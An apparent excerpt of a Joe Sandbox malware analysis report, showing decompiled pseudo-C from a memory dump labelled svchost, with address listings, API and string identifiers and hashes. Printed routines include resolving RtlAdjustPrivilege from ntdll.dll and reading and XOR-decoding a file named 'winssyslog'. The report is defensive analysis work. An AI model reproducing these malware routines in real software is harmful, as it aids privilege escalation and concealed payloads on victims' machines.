                                                            				if (_t195 - _v84 >= 0) goto 0xaf565ad2;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r8w < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x6fa >= 0) goto 0xaf565af1;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r9w < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x970 >= 0) goto 0xaf565b10;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - r10w < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0x9f0 >= 0) goto 0xaf565b2f;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - 0xa66 < 0) goto 0xaf565c60;
                                                            				if (_t195 - 0xa70 >= 0) goto 0xaf565b4c;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - (_t195 & 0x0000ffff) - 0xa66 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _a16 >= 0) goto 0xaf565b6c;
                                                            				goto 0xaf565c5b;
                                                            				if (_t195 - _v120 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v160 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v96 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v152 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v112 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v144 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v88 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v136 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v104 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v128 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v92 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v168 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v164 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v156 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v148 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v140 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v132 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v124 < 0) goto 0xaf565ac8;
                                                            				if (_t195 - _v116 < 0) goto 0xaf565c60;
                                                            				if (_t195 - _v108 >= 0) goto 0xaf565c60;
                                                            				goto 0xaf565ac8;
                                                            				if (_t195 - _v100 >= 0) goto 0xaf565c58;
                                                            				goto 0xaf565c5b;
                                                            				if (((_t195 & 0x0000ffff) - r11d | 0xffffffff) != 0xffffffff) goto 0xaf565c89;
                                                            				_t58 = _t366 - 0x41; // 0xfed9
                                                            				if (_t58 - 0x19 <= 0) goto 0xaf565c77;
                                                            				_t59 = _t366 - 0x61; // 0xfeb9
                                                            				if (_t59 - 0x19 <= 0) goto 0xaf565c77;
                                                            				goto 0xaf565c89;
                                                            				_t60 = _t366 - 0x61; // 0xfeaf
                                                            				if (_t60 - 0x19 > 0) goto 0xaf565c86;
                                                            				if ((_t195 & 0x0000ffff) - 0x20 + 0xffffffc9 == 0) goto 0xaf565c9d;
                                                            				if (r15d != 0) goto 0xaf565cec;
                                                            				_t61 = _t383 + 2; // 0xa
                                                            				r15d = _t61;
                                                            				goto 0xaf565cec;
                                                            				_t352 =  *_t382;
                                                            				r8d = 0xffdf;
                                                            				_t220 =  *_t352 & 0x0000ffff;
                                                            				_t62 = _t352 + 2; // 0xffe1
                                                            				_t370 = _t62;
                                                            				 *_t382 = _t370;
                                                            				_t63 = _t379 - 0x58; // 0x608
                                                            				if ((r8w & _t63) == 0) goto 0xaf565d22;
                                                            				r15d =  ==  ? 8 : r15d;
                                                            				_t371 =  &(_t370[0xffffffffffffffff]);
                                                            				 *_t382 = _t371;
                                                            				if (_t220 == 0) goto 0xaf565ce7;
                                                            				if ( *_t371 == _t220) goto 0xaf565ce7;
                                                            				_t165 = E0000022B22BAF567054(_t352);
                                                            				 *_t352 = 0x16;
                                                            				E0000022B22BAF564328(_t165);
                                                            				r11d = 0xff10;
                                                            				r13d = 0x660;
                                                            				r12d = 0x6f0;
                                                            				if (_t195 - 0x30 < 0) goto 0xaf565ee4;
                                                            				if (_t195 - 0x3a >= 0) goto 0xaf565d41;
                                                            				r8d = _t195 & 0x0000ffff;
                                                            				r8d = r8d - 0x30;
                                                            				goto 0xaf565ede;
                                                            				_t196 =  *_t371 & 0x0000ffff;
                                                            				r15d =  ==  ? 0x10 : r15d;
                                                            				_t70 =  &(_t371[1]); // 0xffe3
                                                            				_t354 = _t70;
                                                            				 *_t382 = _t354;
                                                            				goto 0xaf565ce7;
                                                            				goto 0xaf565cec;
                                                            				if (_t196 - r11w >= 0) goto 0xaf565eca;
                                                            				if (_t196 - r13w < 0) goto 0xaf565ee4;
                                                            				if (_t196 - 0x66a >= 0) goto 0xaf565d6b;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - r13d;
                                                            				goto 0xaf565ede;
                                                            				if (_t196 - r12w < 0) goto 0xaf565ee4;
                                                            				if (_t196 - 0x6fa >= 0) goto 0xaf565d8b;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - r12d;
                                                            				goto 0xaf565ede;
                                                            				if (_t196 - 0x966 < 0) goto 0xaf565ee4;
                                                            				_t71 =  &(_t354[5]); // 0x970
                                                            				r8d = _t71;
                                                            				if (_t196 - r8w >= 0) goto 0xaf565daf;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - 0x966;
                                                            				goto 0xaf565ede;
                                                            				if (_t196 - 0x9e6 < 0) goto 0xaf565ee4;
                                                            				_t72 =  &(_t354[5]); // 0x9f0
                                                            				r8d = _t72;
                                                            				if (_t196 - r8w < 0) goto 0xaf565da3;
                                                            				_t73 = _t390 + 0x76; // 0xa66
                                                            				if (_t196 - _t73 < 0) goto 0xaf565ee4;
                                                            				_t74 =  &(_t354[5]); // 0xa70
                                                            				r8d = _t74;
                                                            				if (_t196 - r8w < 0) goto 0xaf565da3;
                                                            				_t75 = _t390 + 0x76; // 0xae6
                                                            				if (_t196 - _t75 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _a16 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v120 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v160 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v96 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v152 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v112 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v144 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v88 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v136 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v104 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v128 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v92 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v168 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v164 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v156 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v148 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v140 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v132 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v124 < 0) goto 0xaf565da3;
                                                            				if (_t196 - _v116 < 0) goto 0xaf565ee4;
                                                            				if (_t196 - _v108 >= 0) goto 0xaf565ee4;
                                                            				goto 0xaf565da3;
                                                            				if (_t196 - _v100 >= 0) goto 0xaf565eda;
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				r8d = r8d - r11d;
                                                            				goto 0xaf565ede;
                                                            				r8d = r8d | 0xffffffff;
                                                            				if (r8d != 0xffffffff) goto 0xaf565f11;
                                                            				_t98 = _t366 - 0x41; // 0xfecf
                                                            				if (_t98 - 0x19 <= 0) goto 0xaf565efc;
                                                            				_t99 = _t366 - 0x61; // 0xfeaf
                                                            				if (_t99 - 0x19 <= 0) goto 0xaf565efc;
                                                            				r8d = r8d | 0xffffffff;
                                                            				goto 0xaf565f11;
                                                            				_t100 = _t366 - 0x61; // 0xfeaf
                                                            				r8d = _t196 & 0x0000ffff;
                                                            				if (_t100 - 0x19 > 0) goto 0xaf565f0d;
                                                            				r8d = r8d - 0x20;
                                                            				r8d = r8d + 0xffffffc9;
                                                            				if (r8d == 0xffffffff) goto 0xaf565f56;
                                                            				if (r8d - r15d >= 0) goto 0xaf565f56;
                                                            				_t329 = _t396 - (_t352 | 0xffffffff);
                                                            				if (_t329 < 0) goto 0xaf565f32;
                                                            				if (_t329 != 0) goto 0xaf565f2d;
                                                            				if (_t354 - _t379 <= 0) goto 0xaf565f32;
                                                            				goto 0xaf565f44;
                                                            				r14d = r8d;
                                                            				_t355 =  *_t382;
                                                            				_t197 =  *_t355 & 0x0000ffff;
                                                            				 *_t382 =  &(_t355[1]);
                                                            				goto 0xaf565d07;
                                                            				 *_t382 =  &(( *_t382)[0xffffffffffffffff]);
                                                            				r13d = 0;
                                                            				_t357 =  *_t382;
                                                            				if (_t197 == 0) goto 0xaf565f82;
                                                            				if ( *_t357 == _t197) goto 0xaf565f82;
                                                            				_t189 = E0000022B22BAF567054(_t357);
                                                            				 *_t357 = 0x16;
                                                            				E0000022B22BAF564328(_t189);
                                                            				if ((sil & bpl) != 0) goto 0xaf565fa9;
                                                            				 *_t382 = _v48;
                                                            				if (_v56 == r13b) goto 0xaf565910;
                                                            				_t358 = _v80;
                                                            				 *(_t358 + 0x3a8) =  *(_t358 + 0x3a8) & 0xfffffffd;
                                                            				goto 0xaf565910;
                                                            				if (E0000022B22BAF564EB0(r13d | 0xe) == 0) goto 0xaf566036;
                                                            				_t192 = E0000022B22BAF567054(_t358);
                                                            				 *_t358 = 0x22;
                                                            				if ((bpl & 0x00000001) != 0) goto 0xaf565fce;
                                                            				goto 0xaf56603f;
                                                            				if ((bpl & 0x00000002) == 0) goto 0xaf566005;
                                                            				if (_v56 == r13b) goto 0xaf565fea;
                                                            				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                                                            				_t374 = _t382[1];
                                                            				if (_t374 == 0) goto 0xaf565ff9;
                                                            				 *_t374 =  *_t382;
                                                            				goto 0xaf566067;
                                                            				if (_v56 == r13b) goto 0xaf56601b;
                                                            				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                                                            				_t375 = _t382[1];
                                                            				if (_t375 == 0) goto 0xaf56602a;
                                                            				 *_t375 =  *_t382;
                                                            				goto 0xaf566067;
                                                            				if ((bpl & 0x00000002) == 0) goto 0xaf56603f;
                                                            				if (_v56 == r13b) goto 0xaf566055;
                                                            				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                                                            				_t381 = _t382[1];
                                                            				if (_t381 == 0) goto 0xaf566064;
                                                            				 *_t381 =  *_t382;
                                                            				return _t192;
                                                            			}


























































                                                            0x22baf5658d0
                                                            0x22baf5658d0
                                                            0x22baf5658d0
                                                            0x22baf5658d0
                                                            0x22baf5658d5
                                                            0x22baf5658da
                                                            0x22baf5658ef
                                                            0x22baf5658f2
                                                            0x22baf5658f5
                                                            0x22baf5658f8
                                                            0x22baf5658fe
                                                            0x22baf565900
                                                            0x22baf565905
                                                            0x22baf56590b
                                                            0x22baf565910
                                                            0x22baf565917
                                                            0x22baf56591c
                                                            0x22baf565921
                                                            0x22baf565929
                                                            0x22baf56592b
                                                            0x22baf565932
                                                            0x22baf565934
                                                            0x22baf56593c
                                                            0x22baf565947
                                                            0x22baf56595e
                                                            0x22baf565960
                                                            0x22baf565963
                                                            0x22baf56596c
                                                            0x22baf565979
                                                            0x22baf565981
                                                            0x22baf565989
                                                            0x22baf56598e
                                                            0x22baf565994
                                                            0x22baf565996
                                                            0x22baf565999
                                                            0x22baf5659a0
                                                            0x22baf5659a3
                                                            0x22baf5659b0
                                                            0x22baf5659c0
                                                            0x22baf5659cd
                                                            0x22baf5659d5
                                                            0x22baf5659db
                                                            0x22baf5659e3
                                                            0x22baf5659e3
                                                            0x22baf5659e7
                                                            0x22baf5659f4
                                                            0x22baf5659fc
                                                            0x22baf565a02
                                                            0x22baf565a0a
                                                            0x22baf565a10
                                                            0x22baf565a18
                                                            0x22baf565a20
                                                            0x22baf565a28
                                                            0x22baf565a30
                                                            0x22baf565a38
                                                            0x22baf565a40
                                                            0x22baf565a48
                                                            0x22baf565a50
                                                            0x22baf565a58
                                                            0x22baf565a60
                                                            0x22baf565a68
                                                            0x22baf565a70
                                                            0x22baf565a78
                                                            0x22baf565a80
                                                            0x22baf565a8f
                                                            0x22baf565a98
                                                            0x22baf565aa2
                                                            0x22baf565aa9
                                                            0x22baf565ab2
                                                            0x22baf565abb
                                                            0x22baf565ac6
                                                            0x22baf565acd
                                                            0x22baf565ad6
                                                            0x22baf565ae4
                                                            0x22baf565aec
                                                            0x22baf565af5
                                                            0x22baf565b03
                                                            0x22baf565b0b
                                                            0x22baf565b14
                                                            0x22baf565b22
                                                            0x22baf565b2a
                                                            0x22baf565b32
                                                            0x22baf565b40
                                                            0x22baf565b47
                                                            0x22baf565b4f
                                                            0x22baf565b5d
                                                            0x22baf565b67
                                                            0x22baf565b73
                                                            0x22baf565b7e
                                                            0x22baf565b8b
                                                            0x22baf565b96
                                                            0x22baf565ba3
                                                            0x22baf565bae
                                                            0x22baf565bbb
                                                            0x22baf565bc6
                                                            0x22baf565bd3
                                                            0x22baf565bde
                                                            0x22baf565beb
                                                            0x22baf565bf2
                                                            0x22baf565bff
                                                            0x22baf565c06
                                                            0x22baf565c13
                                                            0x22baf565c1a
                                                            0x22baf565c27
                                                            0x22baf565c2e
                                                            0x22baf565c3b
                                                            0x22baf565c42
                                                            0x22baf565c44
                                                            0x22baf565c4e
                                                            0x22baf565c56
                                                            0x22baf565c5e
                                                            0x22baf565c60
                                                            0x22baf565c67
                                                            0x22baf565c69
                                                            0x22baf565c70
                                                            0x22baf565c75
                                                            0x22baf565c77
                                                            0x22baf565c81
                                                            0x22baf565c90
                                                            0x22baf565c95
                                                            0x22baf565c97
                                                            0x22baf565c97
                                                            0x22baf565c9b
                                                            0x22baf565c9d
                                                            0x22baf565ca0
                                                            0x22baf565ca6
                                                            0x22baf565ca9
                                                            0x22baf565ca9
                                                            0x22baf565cad
                                                            0x22baf565cb0
                                                            0x22baf565cb7
                                                            0x22baf565cbc
                                                            0x22baf565cc0
                                                            0x22baf565cc4
                                                            0x22baf565cca
                                                            0x22baf565ccf
                                                            0x22baf565cd1
                                                            0x22baf565cd6
                                                            0x22baf565cdc
                                                            0x22baf565ce1
                                                            0x22baf565cf5
                                                            0x22baf565cfe
                                                            0x22baf565d0a
                                                            0x22baf565d14
                                                            0x22baf565d16
                                                            0x22baf565d1a
                                                            0x22baf565d1d
                                                            0x22baf565d22
                                                            0x22baf565d2d
                                                            0x22baf565d31
                                                            0x22baf565d31
                                                            0x22baf565d35
                                                            0x22baf565d38
                                                            0x22baf565d3f
                                                            0x22baf565d45
                                                            0x22baf565d4f
                                                            0x22baf565d5d
                                                            0x22baf565d5f
                                                            0x22baf565d63
                                                            0x22baf565d66
                                                            0x22baf565d6f
                                                            0x22baf565d7d
                                                            0x22baf565d7f
                                                            0x22baf565d83
                                                            0x22baf565d86
                                                            0x22baf565d93
                                                            0x22baf565d99
                                                            0x22baf565d99
                                                            0x22baf565da1
                                                            0x22baf565da3
                                                            0x22baf565da7
                                                            0x22baf565daa
                                                            0x22baf565db7
                                                            0x22baf565dbd
                                                            0x22baf565dbd
                                                            0x22baf565dc5
                                                            0x22baf565dc7
                                                            0x22baf565dce
                                                            0x22baf565dd4
                                                            0x22baf565dd4
                                                            0x22baf565ddc
                                                            0x22baf565dde
                                                            0x22baf565de5
                                                            0x22baf565df3
                                                            0x22baf565dfc
                                                            0x22baf565e07
                                                            0x22baf565e10
                                                            0x22baf565e1b
                                                            0x22baf565e24
                                                            0x22baf565e2f
                                                            0x22baf565e3c
                                                            0x22baf565e47
                                                            0x22baf565e54
                                                            0x22baf565e5f
                                                            0x22baf565e6c
                                                            0x22baf565e73
                                                            0x22baf565e80
                                                            0x22baf565e87
                                                            0x22baf565e94
                                                            0x22baf565e9b
                                                            0x22baf565ea8
                                                            0x22baf565eaf
                                                            0x22baf565ebc
                                                            0x22baf565ec3
                                                            0x22baf565ec5
                                                            0x22baf565ecf
                                                            0x22baf565ed1
                                                            0x22baf565ed5
                                                            0x22baf565ed8
                                                            0x22baf565eda
                                                            0x22baf565ee2
                                                            0x22baf565ee4
                                                            0x22baf565eeb
                                                            0x22baf565eed
                                                            0x22baf565ef4
                                                            0x22baf565ef6
                                                            0x22baf565efa
                                                            0x22baf565efc
                                                            0x22baf565eff
                                                            0x22baf565f07
                                                            0x22baf565f09
                                                            0x22baf565f0d
                                                            0x22baf565f15
                                                            0x22baf565f1a
                                                            0x22baf565f1e
                                                            0x22baf565f21
                                                            0x22baf565f23
                                                            0x22baf565f2b
                                                            0x22baf565f30
                                                            0x22baf565f39
                                                            0x22baf565f44
                                                            0x22baf565f47
                                                            0x22baf565f4e
                                                            0x22baf565f51
                                                            0x22baf565f56
                                                            0x22baf565f5a
                                                            0x22baf565f5d
                                                            0x22baf565f6b
                                                            0x22baf565f70
                                                            0x22baf565f72
                                                            0x22baf565f77
                                                            0x22baf565f7d
                                                            0x22baf565f85
                                                            0x22baf565f87
                                                            0x22baf565f92
                                                            0x22baf565f98
                                                            0x22baf565f9d
                                                            0x22baf565fa4
                                                            0x22baf565fb5
                                                            0x22baf565fb7
                                                            0x22baf565fbc
                                                            0x22baf565fc6
                                                            0x22baf565fcc
                                                            0x22baf565fd2
                                                            0x22baf565fdc
                                                            0x22baf565fe3
                                                            0x22baf565fea
                                                            0x22baf565ff1
                                                            0x22baf565ff6
                                                            0x22baf566003
                                                            0x22baf56600d
                                                            0x22baf566014
                                                            0x22baf56601b
                                                            0x22baf566022
                                                            0x22baf566027
                                                            0x22baf566034
                                                            0x22baf56603a
                                                            0x22baf566047
                                                            0x22baf56604e
                                                            0x22baf566055
                                                            0x22baf56605c
                                                            0x22baf566061
                                                            0x22baf566087

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: +$-$f$p
                                                            • API String ID: 3215553584-588565063
                                                            • Opcode ID: e2946a4514b7f479ca24c668fcf9bbb0cde032c8894c0529b080685878dc6b83
                                                            • Instruction ID: 7a7207ea5ed3d08a3f4037af125e68f834d0731dd80f8120b2402623d1ed8c52
                                                            • Opcode Fuzzy Hash: e2946a4514b7f479ca24c668fcf9bbb0cde032c8894c0529b080685878dc6b83
                                                            • Instruction Fuzzy Hash: 3712A173674251A6FBB29AD4E14C3EAB762E340764FDC4212E6B5076C6CF3AC984CB44
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53A9C0(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t44;
                                                            				signed long long _t53;
                                                            				long long _t72;
                                                            				void* _t75;
                                                            				signed short* _t76;
                                                            				void* _t78;
                                                            				signed long long _t79;
                                                            
                                                            				_t72 = __rdi;
                                                            				_t44 = __ecx;
                                                            				 *((long long*)(_t78 + 0x18)) = __rbx;
                                                            				_t76 = _t78 - 0x20;
                                                            				_t79 = _t78 - 0x120;
                                                            				_t53 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t76[8] = _t53 ^ _t79;
                                                            				 *((long long*)(_t79 + 0x138)) = __rdi;
                                                            				E0000022B22BAF538B60(_t53 ^ _t79, __rbx, _t79 + 0x60, __rdi, __rsi);
                                                            				 *((char*)(_t76 - 0x30)) = 0x43;
                                                            				 *((long long*)(_t76 - 0x50)) = _t72;
                                                            				 *((long long*)(_t76 - 0x58)) = 0xaf588810;
                                                            				 *((long long*)(_t76 - 0x40)) = _t72;
                                                            				 *((long long*)(_t76 - 0x48)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t76 - 8)) = 0;
                                                            				 *((long long*)(_t76 - 0x18)) = _t72;
                                                            				 *((long long*)(_t76 - 0x10)) = _t72;
                                                            				 *((intOrPtr*)(_t76 - 0x2c)) = 0;
                                                            				 *((long long*)(_t76 - 0x68)) = _t72;
                                                            				 *((long long*)(_t76 - 0x60)) = _t72;
                                                            				 *((long long*)(_t76 - 0x38)) = _t72;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t76 - 0x28)) = _t72;
                                                            				if (( *_t76 & 0x0000ffff) != 1) goto 0xaf53aaf4;
                                                            				 *((short*)(_t79 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t79 + 0x20)) = _t72;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x68))))))(_t75) != 0) goto 0xaf53ab5d;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t79 + 0x60);
                                                            				if ( *((intOrPtr*)(_t76 - 0x18)) == 0) goto 0xaf53aa9e;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x68)))),  *((intOrPtr*)(_t76 - 0x18)));
                                                            				 *((long long*)(_t76 - 0x48)) = 0xaf588690;
                                                            				 *((intOrPtr*)(_t76 - 8)) = 0;
                                                            				 *((long long*)(_t76 - 0x18)) = _t72;
                                                            				 *((long long*)(_t76 - 0x10)) = _t72;
                                                            				 *((long long*)(_t76 - 0x58)) = 0xaf588790;
                                                            				if ( *((intOrPtr*)(_t76 - 0x70)) == 0) goto 0xaf53aad5;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t76 - 0x70)));
                                                            				return E0000022B22BAF55A7C0(_t44, 0xaf588790, _t76[8] ^ _t79);
                                                            			}










                                                            0x22baf53a9c0
                                                            0x22baf53a9c0
                                                            0x22baf53a9c0
                                                            0x22baf53a9c6
                                                            0x22baf53a9cb
                                                            0x22baf53a9d2
                                                            0x22baf53a9dc
                                                            0x22baf53a9ec
                                                            0x22baf53a9f4
                                                            0x22baf53a9fb
                                                            0x22baf53aa06
                                                            0x22baf53aa0a
                                                            0x22baf53aa1a
                                                            0x22baf53aa21
                                                            0x22baf53aa25
                                                            0x22baf53aa28
                                                            0x22baf53aa2c
                                                            0x22baf53aa30
                                                            0x22baf53aa33
                                                            0x22baf53aa37
                                                            0x22baf53aa3b
                                                            0x22baf53aa3f
                                                            0x22baf53aa48
                                                            0x22baf53aa50
                                                            0x22baf53aa58
                                                            0x22baf53aa69
                                                            0x22baf53aa6e
                                                            0x22baf53aa71
                                                            0x22baf53aa7d
                                                            0x22baf53aa8b
                                                            0x22baf53aa97
                                                            0x22baf53aa99
                                                            0x22baf53aaa9
                                                            0x22baf53aab4
                                                            0x22baf53aab7
                                                            0x22baf53aabb
                                                            0x22baf53aac7
                                                            0x22baf53aace
                                                            0x22baf53aad0
                                                            0x22baf53aaf3

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$CloseCreateEventHandleSleep
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 2473550723-64178277
                                                            • Opcode ID: 2ec4c8535db51ff328a987c50087f643e24a6386b0b8f521e7885347254c51fc
                                                            • Instruction ID: fba53a71ab8522ceb5c7d9a917a5bbda2ceb1f2b0872917a5b0e4a93393f8238
                                                            • Opcode Fuzzy Hash: 2ec4c8535db51ff328a987c50087f643e24a6386b0b8f521e7885347254c51fc
                                                            • Instruction Fuzzy Hash: B1717D37604B44A9EB22CFA4E8A83DD77B4FB84798F100616DA8D03BAADF39C145C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 21%
                                                            			E0000022B22BAF53DB10(void* __rcx, long long __rdi, long long __rsi, long long __r14, long long _a16, long long _a24, long long _a32) {
                                                            				signed int _v40;
                                                            				char _v568;
                                                            				intOrPtr _v584;
                                                            				long long _v600;
                                                            				intOrPtr _v608;
                                                            				long long _v616;
                                                            				void* __rbx;
                                                            				signed int _t26;
                                                            				signed int _t55;
                                                            				void* _t56;
                                                            				void* _t57;
                                                            				void* _t62;
                                                            				signed long long _t64;
                                                            				signed long long _t65;
                                                            				signed char* _t66;
                                                            				long long _t68;
                                                            				long long _t86;
                                                            				signed long long _t93;
                                                            				void* _t95;
                                                            				void* _t99;
                                                            
                                                            				_t86 = __rdi;
                                                            				_t64 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t65 = _t64 ^ _t93;
                                                            				_v40 = _t65;
                                                            				_t99 = __rcx;
                                                            				_v584 = 0;
                                                            				r9d = 0;
                                                            				_t4 = _t68 + 8; // 0x8
                                                            				r8d = _t4;
                                                            				E0000022B22BAF549B50(_t68, L"winssyslog",  &_v568, _t95);
                                                            				_v600 = _t68;
                                                            				_t6 = _t68 + 1; // 0x1
                                                            				r8d = _t6;
                                                            				_v608 = 0x80;
                                                            				r9d = 0;
                                                            				_v616 = 3;
                                                            				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                                            				if (_t65 == 0xffffffff) goto 0xaf53dca8;
                                                            				_a16 = __rsi;
                                                            				_a24 = __rdi;
                                                            				_a32 = __r14;
                                                            				_t26 = GetFileSize(??, ??);
                                                            				_t55 = _t26;
                                                            				r14d = _t26;
                                                            				E0000022B22BAF55A828(0, _t65);
                                                            				_v616 = _t68;
                                                            				r8d = _t55;
                                                            				ReadFile(??, ??, ??, ??, ??);
                                                            				if (_t55 == 0) goto 0xaf53dc3d;
                                                            				if (_t55 - 0x20 < 0) goto 0xaf53dc18;
                                                            				asm("movdqa xmm1, [0x4c48c]");
                                                            				asm("movdqu xmm0, [eax+esi]");
                                                            				asm("pxor xmm0, xmm1");
                                                            				asm("movdqu [eax+esi], xmm0");
                                                            				asm("movdqu xmm0, [eax+esi]");
                                                            				asm("pxor xmm0, xmm1");
                                                            				asm("movdqu [eax+esi], xmm0");
                                                            				if (0x20 - _t55 - (_t55 & 0x0000001f) < 0) goto 0xaf53dbf0;
                                                            				_t62 = 0x20 - _t55;
                                                            				if (_t62 >= 0) goto 0xaf53dc3d;
                                                            				_t66 = _t65 + _t65;
                                                            				asm("o16 nop [eax+eax]");
                                                            				 *_t66 =  *_t66 ^ 0x00000058;
                                                            				_t67 =  &(_t66[1]);
                                                            				if (_t62 != 0) goto 0xaf53dc30;
                                                            				_t17 = _t86 + 1; // 0x1
                                                            				LocalAlloc(??, ??);
                                                            				_t18 =  &(_t67[1]); // 0x1
                                                            				_t66[1] = 0x7f;
                                                            				E0000022B22BAF562BA0(0x40, _t55, _t56, _t57, _t18, _t65,  &(_t66[1]), _t65, __r14);
                                                            				r9b = 0x3f;
                                                            				r8d = _t17;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t99 + 8)), _t67);
                                                            				LocalFree(??);
                                                            				E0000022B22BAF55A7E4(_t67, _t65);
                                                            				CloseHandle(??);
                                                            				return E0000022B22BAF55A7C0(0x40, _t67, _v40 ^ _t93);
                                                            			}























                                                            0x22baf53db10
                                                            0x22baf53db1c
                                                            0x22baf53db23
                                                            0x22baf53db26
                                                            0x22baf53db35
                                                            0x22baf53db38
                                                            0x22baf53db3c
                                                            0x22baf53db46
                                                            0x22baf53db46
                                                            0x22baf53db4a
                                                            0x22baf53db4f
                                                            0x22baf53db54
                                                            0x22baf53db54
                                                            0x22baf53db58
                                                            0x22baf53db65
                                                            0x22baf53db68
                                                            0x22baf53db75
                                                            0x22baf53db82
                                                            0x22baf53db88
                                                            0x22baf53db92
                                                            0x22baf53db9d
                                                            0x22baf53dba5
                                                            0x22baf53dbad
                                                            0x22baf53dbaf
                                                            0x22baf53dbb2
                                                            0x22baf53dbbc
                                                            0x22baf53dbc1
                                                            0x22baf53dbcd
                                                            0x22baf53dbd5
                                                            0x22baf53dbda
                                                            0x22baf53dbdc
                                                            0x22baf53dbf2
                                                            0x22baf53dbf7
                                                            0x22baf53dbfb
                                                            0x22baf53dc06
                                                            0x22baf53dc0b
                                                            0x22baf53dc0f
                                                            0x22baf53dc16
                                                            0x22baf53dc18
                                                            0x22baf53dc1a
                                                            0x22baf53dc20
                                                            0x22baf53dc25
                                                            0x22baf53dc30
                                                            0x22baf53dc33
                                                            0x22baf53dc3b
                                                            0x22baf53dc3d
                                                            0x22baf53dc47
                                                            0x22baf53dc56
                                                            0x22baf53dc5a
                                                            0x22baf53dc5d
                                                            0x22baf53dc66
                                                            0x22baf53dc69
                                                            0x22baf53dc6f
                                                            0x22baf53dc79
                                                            0x22baf53dc82
                                                            0x22baf53dc8a
                                                            0x22baf53dcc5

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
